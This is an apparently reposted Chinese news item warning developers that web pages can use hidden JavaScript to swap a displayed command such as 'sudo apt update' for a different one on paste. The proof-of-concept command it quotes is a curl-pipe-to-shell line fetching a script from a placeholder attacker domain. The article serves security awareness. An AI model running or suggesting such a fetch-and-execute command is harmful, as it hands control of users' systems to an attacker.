龙空技术网

从陌生网页上复制/贴上命令列要小心被黑

信息安全那些事 732

前言:

当前我们对“ubuntu粘贴板不能用”大约比较关注,姐妹们都需要了解一些“ubuntu粘贴板不能用”的相关文章。那么小编同时在网络上收集了一些关于“ubuntu粘贴板不能用””的相关文章,希望同学们能喜欢,大家快快来学习一下吧!

安全研究人员警告,HTML页面上的命令列可能藏匿恶意程序码,开发者稍有不察直接复制贴上终端时,可能就让黑客得以于程序中植入后门。

复制粘贴要当心,病毒代码在执行

一名安全研究人员Gabriel Friedlander近日警告,随手从网络上复制与贴上(Copy/Paste)命令列时要特别小心,因为黑客可能趁此骇进开发者的系统或应用程序。

Friedlander打造了一个概念性验证攻击手法,他设计一个假装可用来更新Ubuntu作业系统的命令列,该命令列显示的文字很简单,为「sudo apt update」,但当开发者复制它,并将它贴上记事本或终端时,它出现的却是「curl http[:]//attacker-domain:8000/shell.sh | sh 」,若是直接贴入终端,它将立即执行。

这是因为Friedlander在此一HTML页面上藏匿了JavaScript程序码,而让开发者眼见的文字与贴上之后所呈现的内容完全不同。

Friedlander说,不管是新手或是熟练的开发者,都可能会从网络上复制命令列或部份程序码,但这是非常危险的行为,也许会让黑客直接于程序中植入后门,相关的攻击非常地简单,却可能带来极大的伤害,建议开发者应永远避免于终端贴上直接自网络上复制的命令列。

标签: #ubuntu粘贴板不能用 #ubuntu无法粘贴文字